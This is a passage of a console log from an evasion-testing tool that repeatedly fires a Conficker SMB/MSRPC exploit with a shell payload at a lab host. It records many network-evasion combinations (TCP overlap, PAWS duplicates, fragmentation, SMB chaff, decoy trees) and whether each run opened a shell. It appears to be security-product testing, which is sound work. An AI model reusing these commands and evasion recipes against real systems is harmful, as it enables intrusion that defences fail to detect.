  2273. - TCP segments are set to overlap by 7 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  2274. The following evasions are applied from stage smb_openpipe to end:
  2275. - TCP packets are segmented to contain at most 7 bytes of payload.
  2276. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2277. - TCP segments produced by a single socket send() are sent in a random order
  2278.  
  2279. Info: NetBIOS connection 10.62.90.116:54207 -> 10.35.1.207:445
  2280. Terminated
  2281. ..
  2282. 3865 runs averaging 1.91 runs / second ; progress: 2022/43200.2015-06-07 23:53:13 INFO
  2283. Success. (10.62.90.113):
  2284. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11317 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QVdIvWYv1gI --evasion=[smb_opentree,end]tcp_paws,"3","7","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"5","random_alpha" --verifydelay=1000 --payload=shell
  2285. Info: Using random seed QVdIvWYv1gJ
  2286. The following evasions are applied from stage smb_opentree to end:
  2287. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
  2288. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2289. - Add a random alphaurgent data byte to every 5 TCP segment.
  2290.  
  2291. Info: NetBIOS connection 10.62.90.113:11317 -> 10.35.1.207:445
  2292. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2293. Info: Sending MSRPC request with exploit
  2294. Info: Shell found, attack succeeded
  2295. Info: Shell closed
  2296. 0: Success.
  2297. ...
  2298. 3870 runs averaging 1.91 runs / second ; progress: 2027/43200......
  2299. 3876 runs averaging 1.91 runs / second ; progress: 2032/43200.2015-06-07 23:53:22 INFO
  2300. Success. (10.62.90.118):
  2301. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62100 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=uZVoYbn3bLE --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_unspec|empty_keepalive|small_unspec|http_get|broken_length" --evasion=[smb_openpipe,end]tcp_paws,"8","102823530","random_alpha" --verifydelay=1000 --payload=shell
  2302. Info: Using random seed uZVoYbn3bLG
  2303. The following evasions are applied from stage smb_openpipe to end:
  2304. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 102823530> and has random alpha bytes as payload
  2305. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2306.  
  2307. Info: NetBIOS connection 10.62.90.118:62100 -> 10.35.1.207:445
  2308. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2309. Info: Sending MSRPC request with exploit
  2310. Info: Shell found, attack succeeded
  2311. Info: Shell closed
  2312. 0: Success.
  2313. ............
  2314. 3890 runs averaging 1.91 runs / second ; progress: 2037/43200...............
  2315. 3905 runs averaging 1.91 runs / second ; progress: 2042/43200..........
  2316. 3915 runs averaging 1.91 runs / second ; progress: 2047/43200Pid 26530 timed out - killed
  2317. 2015-06-07 23:53:37 INFO
  2318. Timed out (10.62.90.119):
  2319. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45731 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HlA8q8WZBQg --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_unspec","float_vax","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,msrpc_req]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  2320. Info: Using random seed HlA8q8WZBQg
  2321. The following evasions are applied from stage smb_openpipe to end:
  2322. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  2323. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2324. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  2325. The following evasions are applied from stage msrpc_bind to end:
  2326. - MSRPC NDR flag is modified:
  2327. * Unspecified character encoding
  2328. * VAX floating point value encoding
  2329. * Reserved 3rd byte is set to a random non-zero value
  2330. * Reserved 4th byte is set to a random non-zero value
  2331.  
  2332.  
  2333. Info: NetBIOS connection 10.62.90.119:45731 -> 10.35.1.207:445
  2334. Terminated
  2335. .........
  2336. 3925 runs averaging 1.91 runs / second ; progress: 2052/43200..............
  2337. 3939 runs averaging 1.91 runs / second ; progress: 2057/43200.......
  2338. 3946 runs averaging 1.91 runs / second ; progress: 2062/43200
  2339. 3946 runs averaging 1.91 runs / second ; progress: 2067/43200
  2340. 3946 runs averaging 1.90 runs / second ; progress: 2072/43200.........
  2341. 3955 runs averaging 1.90 runs / second ; progress: 2077/43200.........
  2342. 3964 runs averaging 1.90 runs / second ; progress: 2082/43200.........2015-06-07 23:54:16 INFO
  2343. Success. (10.62.90.112):
  2344. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26191 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CWCzNaZMK7E --evasion=[start,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","212579014","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
  2345. Info: Using random seed CWCzNaZMK7E
  2346. The following evasions are applied from stage start to msrpc_bind:
  2347. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2348. * Invalid TCP checksum.
  2349. * NULL TCP control flags.
  2350. * An out-of-window sequence number.
  2351. * TCP header shorter than 20 bytes
  2352. * TCP header longer than packet total size
  2353. * Duplicate packet has random alpha bytes as payload
  2354. The following evasions are applied from stage smb_connect to msrpc_req:
  2355. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 212579014> and has original payload with alphanumeric bytes randomized
  2356. The following evasions are applied from stage msrpc_bind to end:
  2357. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
  2358.  
  2359. Info: NetBIOS connection 10.62.90.112:26191 -> 10.35.1.207:445
  2360. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2361. Info: Sending MSRPC request with exploit
  2362. Info: Shell found, attack succeeded
  2363. Info: Command shell connection reset.
  2364. Info: CommandShell::SendCommand() - Failed to send string
  2365. Info: Shell closed
  2366. 0: Success.
  2367. .
  2368. 3975 runs averaging 1.90 runs / second ; progress: 2087/43200...........
  2369. 3986 runs averaging 1.91 runs / second ; progress: 2092/43200..Pid 27448 timed out - killed
  2370. 2015-06-07 23:54:23 INFO
  2371. Timed out (10.62.90.114):
  2372. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63893 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TYsSONBPM0I --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"32" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  2373. Info: Using random seed TYsSONBPM0J
  2374. The following evasions are applied from stage netbios_connect to msrpc_req:
  2375. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  2376. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2377. - IPv4 fragments with at most 32 bytes per fragment
  2378.  
  2379. Info: NetBIOS connection 10.62.90.114:63893 -> 10.35.1.207:445
  2380. Terminated
  2381. ..........
  2382. 3999 runs averaging 1.91 runs / second ; progress: 2097/43200............
  2383. 4011 runs averaging 1.91 runs / second ; progress: 2102/43200.................
  2384. 4028 runs averaging 1.91 runs / second ; progress: 2107/43200.............
  2385. 4041 runs averaging 1.91 runs / second ; progress: 2112/43200....
  2386. 4045 runs averaging 1.91 runs / second ; progress: 2117/43200
  2387. 4045 runs averaging 1.91 runs / second ; progress: 2122/43200...
  2388. 4048 runs averaging 1.90 runs / second ; progress: 2127/43200...............
  2389. 4063 runs averaging 1.91 runs / second ; progress: 2132/43200..........
  2390. 4073 runs averaging 1.91 runs / second ; progress: 2137/43200.2015-06-07 23:55:08 INFO
  2391. Success. (10.62.90.112):
  2392. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13755 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=UGUgfnLSS3I --evasion=[msrpc_req,end]smb_chaff,"3","write_flag","rand" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"10","zero" --evasion=[netbios_connect,end]tcp_paws,"25%","9","alpharandomized" --verifydelay=1000 --payload=shell
  2393. Info: Using random seed UGUgfnLSS3J
  2394. The following evasions are applied from stage netbios_connect to end:
  2395. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
  2396. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2397. - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  2398. The following evasions are applied from stage msrpc_req to end:
  2399. - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  2400.  
  2401. Info: NetBIOS connection 10.62.90.112:13755 -> 10.35.1.207:445
  2402. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2403. Info: Sending MSRPC request with exploit
  2404. Info: Shell found, attack succeeded
  2405. Info: Shell closed
  2406. 0: Success.
  2407. ........
  2408. 4083 runs averaging 1.91 runs / second ; progress: 2142/43200.....
  2409. 4088 runs averaging 1.90 runs / second ; progress: 2147/43200.....
  2410. 4093 runs averaging 1.90 runs / second ; progress: 2152/43200......
  2411. 4099 runs averaging 1.90 runs / second ; progress: 2157/43200...........
  2412. 4110 runs averaging 1.90 runs / second ; progress: 2162/43200..Pid 28656 timed out - killed
  2413. 2015-06-07 23:55:34 INFO
  2414. Timed out (10.62.90.115):
  2415. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40200 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Psu0DJsbrY8 --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"75%","chksum|nullchksum|nullflag|shorthdr","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  2416. Info: Using random seed Psu0DJsbrY8
  2417. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2418. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  2419. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2420. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  2421. * Invalid TCP checksum.
  2422. * NULL TCP checksum.
  2423. * NULL TCP control flags.
  2424. * TCP header shorter than 20 bytes
  2425. * Duplicate packet has random bytes as payload
  2426.  
  2427. Info: NetBIOS connection 10.62.90.115:40200 -> 10.35.1.207:445
  2428. Terminated
  2429. ....2015-06-07 23:55:37 INFO
  2430. Success. (10.62.90.116):
  2431. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18364 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=0UFzFvAvo1k --evasion=[smb_connect,end]tcp_paws,"5","268435455","shuffle" --evasion=[smb_opentree,end]tcp_paws,"1","7","alphanumrandomized" --verifydelay=1000 --payload=shell
  2432. Info: Using random seed 0UFzFvAvo1n
  2433. The following evasions are applied from stage smb_connect to end:
  2434. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  2435. The following evasions are applied from stage smb_opentree to end:
  2436. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  2437.  
  2438. Info: NetBIOS connection 10.62.90.116:18364 -> 10.35.1.207:445
  2439. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2440. Info: Sending MSRPC request with exploit
  2441. Info: Shell found, attack succeeded
  2442. Info: Shell closed
  2443. 0: Success.
  2444.  
  2445. 4118 runs averaging 1.90 runs / second ; progress: 2167/43200.........
  2446. 4127 runs averaging 1.90 runs / second ; progress: 2172/43200..............
  2447. 4141 runs averaging 1.90 runs / second ; progress: 2178/43200..Pid 28876 timed out - killed
  2448. 2015-06-07 23:55:48 INFO
  2449. Timed out (10.62.90.117):
  2450. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Qd7YC0/440M --evasion=[start,netbios_connect]ipv4_opt,"2","inc","zero" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  2451. Info: Using random seed Qd7YC0/440N
  2452. The following evasions are applied from stage start to netbios_connect:
  2453. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2454. The duplicate packet has NULL bytes for payload
  2455. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2456. - Add a random alphaurgent data byte to every 1 TCP segment.
  2457.  
  2458. Info: NetBIOS connection 10.62.90.117:50364 -> 10.35.1.207:445
  2459. Terminated
  2460. ........Pid 28942 timed out - killed
  2461. 2015-06-07 23:55:51 INFO
  2462. Timed out (10.62.90.111):
  2463. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57424 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=C0OcLkrMnfY --evasion=[start,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_overlap,"717","new","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2464. Info: Using random seed C0OcLkrMnfY
  2465. - IPv4 fragments with at most 56 bytes per fragment
  2466. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2467. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2468. The following evasions are applied from stage msrpc_bind to end:
  2469. - TCP segments are set to overlap by 717 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  2470.  
  2471. Info: NetBIOS connection 10.62.90.111:57424 -> 10.35.1.207:445
  2472. Terminated
  2473. .
  2474. 4154 runs averaging 1.90 runs / second ; progress: 2183/43200...........
  2475. 4165 runs averaging 1.90 runs / second ; progress: 2188/43200.2015-06-07 23:55:58 INFO
  2476. Success. (10.62.90.111):
  2477. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61300 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=IvJxSTiwIlk --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_connect,end]tcp_paws,"75%","268435453","shuffle" --verifydelay=1000 --payload=shell
  2478. Info: Using random seed IvJxSTiwIlk
  2479. The following evasions are applied from stage smb_connect to end:
  2480. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has shuffled original payload
  2481. The following evasions are applied from stage msrpc_bind to end:
  2482. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2483. The duplicate packet has shuffled TCP payload
  2484.  
  2485. Info: NetBIOS connection 10.62.90.111:61300 -> 10.35.1.207:445
  2486. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2487. Info: Sending MSRPC request with exploit
  2488. Info: Shell found, attack succeeded
  2489. Info: Shell closed
  2490. 0: Success.
  2491. ........
  2492. 4175 runs averaging 1.90 runs / second ; progress: 2193/43200.................
  2493. 4192 runs averaging 1.91 runs / second ; progress: 2198/43200.....................
  2494. 4213 runs averaging 1.91 runs / second ; progress: 2203/43200.........
  2495. 4222 runs averaging 1.91 runs / second ; progress: 2208/43200.....
  2496. 4227 runs averaging 1.91 runs / second ; progress: 2213/43200..2015-06-07 23:56:24 INFO
  2497. Success. (10.62.90.116):
  2498. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21077 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=r+UXSHT7fyw --evasion=[smb_connect,msrpc_bind]smb_chaff,"5","write_flag","zero" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","7","8","random_msrpcbind" --verifydelay=1000 --payload=shell
  2499. Info: Using random seed r+UXSHT7fyy
  2500. The following evasions are applied from stage smb_connect to msrpc_bind:
  2501. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  2502. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2503. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  2504.  
  2505. Info: NetBIOS connection 10.62.90.116:21077 -> 10.35.1.207:445
  2506. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2507. Info: Sending MSRPC request with exploit
  2508. Info: Shell found, attack succeeded
  2509. Info: CommandShell::SendCommand() - Failed to send string
  2510. Info: Command shell connection reset.
  2511. Info: Shell closed
  2512. 0: Success.
  2513. ........
  2514. 4238 runs averaging 1.91 runs / second ; progress: 2218/43200.....
  2515. 4243 runs averaging 1.91 runs / second ; progress: 2223/43200...........
  2516. 4254 runs averaging 1.91 runs / second ; progress: 2228/43200.....
  2517. 4259 runs averaging 1.91 runs / second ; progress: 2233/43200..................
  2518. 4277 runs averaging 1.91 runs / second ; progress: 2238/43200...............
  2519. 4292 runs averaging 1.91 runs / second ; progress: 2243/43200..........
  2520. 4302 runs averaging 1.91 runs / second ; progress: 2248/43200...........
  2521. 4313 runs averaging 1.91 runs / second ; progress: 2253/43200.............
  2522. 4326 runs averaging 1.92 runs / second ; progress: 2258/43200................
  2523. 4342 runs averaging 1.92 runs / second ; progress: 2263/43200.......
  2524. 4349 runs averaging 1.92 runs / second ; progress: 2268/43200....
  2525. 4353 runs averaging 1.92 runs / second ; progress: 2273/43200.........
  2526. 4362 runs averaging 1.91 runs / second ; progress: 2278/43200........
  2527. 4370 runs averaging 1.91 runs / second ; progress: 2283/432002015-06-07 23:57:33 INFO
  2528. Success. (10.62.90.115):
  2529. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55850 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=XzJN6u3j/GI --evasion=[start,smb_openpipe]ipv4_frag,"1464" --evasion=[start,smb_connect]ipv4_order,"lastfirst" --evasion=[netbios_connect,end]tcp_paws,"3","8","shuffle" --verifydelay=1000 --payload=shell
  2530. Info: Using random seed XzJN6u3j/GJ
  2531. The following evasions are applied from stage start to smb_openpipe:
  2532. - IPv4 fragments with at most 1464 bytes per fragment
  2533. The following evasions are applied from stage start to smb_connect:
  2534. - IPv4 fragments are sent in correct order except that the last fragment comes first
  2535. The following evasions are applied from stage netbios_connect to end:
  2536. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
  2537.  
  2538. Info: NetBIOS connection 10.62.90.115:55850 -> 10.35.1.207:445
  2539. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2540. Info: Sending MSRPC request with exploit
  2541. Info: Shell found, attack succeeded
  2542. Info: Shell closed
  2543. 0: Success.
  2544. .
  2545. 4372 runs averaging 1.91 runs / second ; progress: 2288/43200
  2546. 4372 runs averaging 1.91 runs / second ; progress: 2293/43200..
  2547. 4374 runs averaging 1.90 runs / second ; progress: 2298/43200.........
  2548. 4383 runs averaging 1.90 runs / second ; progress: 2303/43200Pid 30126 timed out - killed
  2549. 2015-06-07 23:57:54 INFO
  2550. Timed out (10.62.90.110):
  2551. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32027 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=wUBn/BV2FEU --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[start,smb_connect]tcp_paws,"21","120695731","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  2552. Info: Using random seed wUBn/BV2FEX
  2553. The following evasions are applied from stage start to smb_connect:
  2554. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 120695731> and has random alphanumeric bytes as payload
  2555. The following evasions are applied from stage smb_connect to end:
  2556. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  2557. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2558. - 75% probability to add a random urgent data byte to a TCP segment.
  2559.  
  2560. Info: NetBIOS connection 10.62.90.110:32027 -> 10.35.1.207:445
  2561. Terminated
  2562. .....
  2563. 4389 runs averaging 1.90 runs / second ; progress: 2308/43200....
  2564. 4393 runs averaging 1.90 runs / second ; progress: 2313/43200......
  2565. 4399 runs averaging 1.90 runs / second ; progress: 2318/43200.........
  2566. 4408 runs averaging 1.90 runs / second ; progress: 2323/43200....2015-06-07 23:58:17 INFO
  2567. Success. (10.62.90.116):
  2568. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34566 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Hhd5F+J7AnY --evasion=[smb_opentree,msrpc_bind]ipv4_frag,"832" --evasion=[msrpc_bind,end]smb_decoytrees,"6","1","7","random_msrpcreq" --verifydelay=1000 --payload=shell
  2569. Info: Using random seed Hhd5F+J7AnY
  2570. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2571. - IPv4 fragments with at most 832 bytes per fragment
  2572. The following evasions are applied from stage msrpc_bind to end:
  2573. - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  2574.  
  2575. Info: NetBIOS connection 10.62.90.116:34566 -> 10.35.1.207:445
  2576. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2577. Info: Sending MSRPC request with exploit
  2578. Info: Shell found, attack succeeded
  2579. Info: Command shell connection reset.
  2580. Info: CommandShell::SendCommand() - Failed to send string
  2581. Info: Shell closed
  2582. 0: Success.
  2583. ..
  2584. 4415 runs averaging 1.90 runs / second ; progress: 2328/43200.......
  2585. 4422 runs averaging 1.90 runs / second ; progress: 2333/43200..........
  2586. 4432 runs averaging 1.90 runs / second ; progress: 2338/43200............
  2587. 4444 runs averaging 1.90 runs / second ; progress: 2343/43200.........
  2588. 4453 runs averaging 1.90 runs / second ; progress: 2348/43200..........
  2589. 4463 runs averaging 1.90 runs / second ; progress: 2353/43200.......Pid 31109 timed out - killed
  2590. 2015-06-07 23:58:47 INFO
  2591. Timed out (10.62.90.113):
  2592. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37344 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=FvSgjVWqTCk --evasion=[netbios_connect,smb_openpipe]ipv4_frag,"48" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","6","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  2593. Info: Using random seed FvSgjVWqTCk
  2594. The following evasions are applied from stage netbios_connect to smb_openpipe:
  2595. - IPv4 fragments with at most 48 bytes per fragment
  2596. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
  2597. The following evasions are applied from stage smb_opentree to msrpc_req:
  2598. - Add a random alphaurgent data byte to every 2 TCP segment.
  2599.  
  2600. Info: NetBIOS connection 10.62.90.113:37344 -> 10.35.1.207:445
  2601. Terminated
  2602. .......
  2603. 4478 runs averaging 1.90 runs / second ; progress: 2358/43200......Pid 31179 timed out - killed
  2604. 2015-06-07 23:58:50 INFO
  2605. Timed out (10.62.90.119):
  2606. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19295 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Kz3v1sEnRX8 --evasion=[smb_connect,msrpc_req]tcp_segvar,"6","62790" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2607. Info: Using random seed Kz3v1sEnRX8
  2608. The following evasions are applied from stage smb_connect to msrpc_req:
  2609. - TCP packets are segmented to contain between 6 and 62790 bytes of payload.
  2610. The following evasions are applied from stage smb_opentree to end:
  2611. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2612.  
  2613. Info: NetBIOS connection 10.62.90.119:19295 -> 10.35.1.207:445
  2614. Terminated
  2615. ..................
  2616. 4503 runs averaging 1.91 runs / second ; progress: 2363/43200............
  2617. 4515 runs averaging 1.91 runs / second ; progress: 2369/43200......
  2618. 4521 runs averaging 1.90 runs / second ; progress: 2374/43200......
  2619. 4527 runs averaging 1.90 runs / second ; progress: 2379/43200.............2015-06-07 23:59:12 INFO
  2620. Success. (10.62.90.110):
  2621. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30148 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jbJwefC+liw --evasion=[netbios_connect,smb_connect]ipv4_opt,"3","inc","shuffletcp" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","8","shuffle" --verifydelay=1000 --payload=shell
  2622. Info: Using random seed jbJwefC+liy
  2623. The following evasions are applied from stage netbios_connect to smb_connect:
  2624. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2625. The duplicate packet has shuffled TCP payload
  2626. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2627. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
  2628.  
  2629. Info: NetBIOS connection 10.62.90.110:30148 -> 10.35.1.207:445
  2630. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2631. Info: Sending MSRPC request with exploit
  2632. Info: Shell found, attack succeeded
  2633. Info: Shell closed
  2634. 0: Success.
  2635. ...
  2636. 4544 runs averaging 1.91 runs / second ; progress: 2384/43200........2015-06-07 23:59:17 INFO
  2637. Success. (10.62.90.113):
  2638. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63960 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=j+EzmmWE6BM --evasion=[smb_opentree,end]tcp_paws,"25%","9","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
  2639. Info: Using random seed j+EzmmWE6BO
  2640. The following evasions are applied from stage smb_opentree to end:
  2641. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
  2642. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2643. - Add a random alphaurgent data byte to every 13 TCP segment.
  2644.  
  2645. Info: NetBIOS connection 10.62.90.113:63960 -> 10.35.1.207:445
  2646. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2647. Info: Sending MSRPC request with exploit
  2648. Info: Shell found, attack succeeded
  2649. Info: Shell closed
  2650. 0: Success.
  2651. ....
  2652. 4557 runs averaging 1.91 runs / second ; progress: 2389/43200.........
  2653. 4566 runs averaging 1.91 runs / second ; progress: 2394/43200.................
